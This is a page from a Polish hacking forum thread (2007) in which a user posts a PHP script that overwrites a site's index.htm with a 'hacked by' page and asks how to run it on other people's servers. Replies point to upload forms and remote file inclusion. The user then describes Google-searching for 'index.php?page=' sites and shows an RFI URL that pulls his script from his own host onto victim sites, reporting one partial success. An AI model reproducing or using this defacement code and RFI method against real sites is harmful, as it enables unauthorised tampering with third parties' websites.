Strona 1 z 4 123 ... OstatniOstatni
Pokaż wyniki 1 do 10 z 31

Temat: sql inj

  1. #1
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie sql injection

    Cześć, wyskrobałem coś takiego:
    Kod:
    <?php
    $index = "index.htm";
    if (is_writeable($index))
      {
       if ($plik = fopen($index, "w+"))
         {
          if (fwrite($plik, "<html><body bgcolor=black><center><h1><font 
    color=red>hacked<br>by<br>quite<br>lame</font></center>"."
    "."</body></html>") !== FALSE) echo "__O.K__";
            else echo "Nie ok!";
          fclose($plik);
         } else echo "Nie ok.";
      } else echo "Nie ok."
      
    ?>
    Dziala, moje pytanie brzmi w jakie są metody wykonania tego kodu na obcym serwerze (nie przez ftp) ;P
    Ostatnio edytowane przez gogulas : 10-18-2007 - 18:19 Powód: kaprys
    http://gogulas.yoyo.pl/h.gif

  2. #2
    Zarejestrowany
    Oct 2007
    Postów
    39

    Domyślnie

    Nie wiem czy to coś pomoże, bo szczerze mówiąc nie chce mi się przeglądać tych videoartów, ale może tu coś będzie.

  3. #3
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    mi też się nie chce na dodatek nie mam kompa do video :/
    mam pytanko, odnosnie includowanai plikow z poza serwera, wyskakuje mi taki komunikat:

    Kod:
    Warning: main(www.gogulas.yoyo.pl/inc/lan.htm) [function.main]: failed to open stream: No such file or directory in /var/www/sites/yoyo.pl/g/o/gogulas/inc/index.php on line 23
    Kod:
    Warning: main() [function.include]: Failed opening 'www.gogulas.yoyo.pl/inc/lan.htm' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/sites/yoyo.pl/g/o/gogulas/inc/index.php on line 23
    Czy to znaczy że funkcja includowania z zewnatrz jest na tym serwerze zablokowana? jesli to tak jest szansa na include z tego samego serwera tylko ze z innego konta?
    http://gogulas.yoyo.pl/h.gif

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jesli nie mozesz zaladowac pliku przez FTP to moze serwer ma:
    - file upload przez strone - wgraj swoj kod i jazda
    - blad ze zmiennymi globalnymi w sofcie ktorego uzywa - remote file include
    ... a dalej kombinacje powyzszych i nieco fantazji
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Oct 2007
    Postów
    39

    Domyślnie

    nie mam kompa do video
    Może mały offtop, ale tak na przyszłość...

    Geexbox - Linux LiveCD - odtwarzacz multimediów - obrz ISO zajmuje 7MB i odtwarza praktycznie każdy tym plików multimedialnych. Na jakiejś imprezce dzięki temu na staaarym kompie koleżanki oglądaliśmy filmy na spokojnie. I mozna zapisać na CD, Mini-CD i BuissnesCard.

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Fajny off-top i moze sie przydac

    @gogulas - a moze podalys co to za usluga? www.blablabla.pl to plik lokalny a http://www.blablabla.pl to juz zdalna lokalizacja.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    humm chyba sie leciutko nie rozumiemy, piszac "nie przez ftp" mialem na mysli forme ataku ktora nie wymagala by recznego wgrania tego liku na konto ofiary po czym uruchomiania z linku bo majac dostep do ftp moglbym... zreszta nie wazne, tak gwoli wyjasnienia to pisze

    w kodzie mam:
    Kod:
    <?php 
    include('www.gogulas.yoyo.pl/inc/lan.htm'); 
    ?>
    i wyskakuje powyzszy blad, jesli dam
    Kod:
    <?php 
    include('lan.htm'); 
    ?>
    to oczywiscie wszystko gra, plik sie dodaje do zawartosci strony, mozna na to cos poradzic?

    P.S.X
    my cpu info:
    cel 466 up2 525
    no sound cart
    so no way to play any video....
    http://gogulas.yoyo.pl/h.gif

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    tak jak napisalem... piwerszy przypadek laduje plik z katalogu jaki podany a nie ze strony WWW bo nie ma z przodu 'http://'. Dziala wiec wtedy na tej samej zasadzie co drugi ale nie widzi pliku.

    Co do masowego ladowania Twojego pliku na wiele stron hmmmm... da sie zrobic, nie do konca samo z siebie zadziala - trzeba popchnac Tzn mozna zautomatyzowac ale i tak trzeba bedzie cele recznie wyszukac.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #9
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    no własnie, nie widzi pliku, "No such file or directory", kiedy dam http:// wyskakuje, ze: "Connection refused" więc chyba lipa z includowaniem plikow z zewnatrz, wspinanie sie w hierarchii też gowno dalo, jest jakas nadzieja? chyba nie bo z tego co wiem duzo hostow jest skonfigurowanych w taki wlasnie sposob

    Czy ocieram sie chociaz o tematyke deface? :P
    Ostatnio edytowane przez gogulas : 10-18-2007 - 21:53 Powód: system error
    http://gogulas.yoyo.pl/h.gif

  10. #10
    Avatar gogulas
    gogulas jest offline killboy powerhead
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Ufff, 3 godziny orania google i tylko jedna strona na której ten "myk" zadziałał, (dostalem echo "O.K") ale i tak się index nie zmienił :/

    Robie to tak:
    w googlach wpisuje fraze "index.php?page=" szukajac stron gdzie pobierany jest parametr page w celu includnięcia go do strony...

    Kod:
    http://www.atakowana_strona.com/index.php?page=http://gogulas.yoyo.pl/lol
    juz bez .php na końcu bo skrypt to sam dodaje, no chyba że znajde strone na której np. jest coś takiego "index.php?page=regulamin.html" ale to margines...
    bardzo wiele stron wyświetla błędy, jest to najczęsciej info o tym ze:
    taki plik nie istnieje na tym serwerze
    nie mam uprawnień do edycji index.php
    "Connection refused"
    -----------------------------------------------------------------------
    <hr>

    Jakie są jeszcze metody defacu poprzez injection
    Ostatnio edytowane przez gogulas : 10-19-2007 - 20:23
    http://gogulas.yoyo.pl/h.gif

Strona 1 z 4 123 ... OstatniOstatni

Podobne wątki

  1. Excel -> SQL
    By TQM in forum Perl/Python/TCL/Prolog
    Odpowiedzi: 8
    Autor: 04-18-2011, 16:25
  2. sql injection
    By ble34 in forum Security
    Odpowiedzi: 7
    Autor: 06-13-2007, 16:45
  3. ADOdb a SQL Injection
    By prawie jak haker in forum Hacking
    Odpowiedzi: 1
    Autor: 06-10-2007, 12:35
  4. pomocy z zapytaniem SQL :)
    By mendi in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 04-29-2007, 13:55
  5. zastrzyki sql
    By ble34 in forum Newbie - dla początkujących!
    Odpowiedzi: 20
    Autor: 11-04-2006, 23:14

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj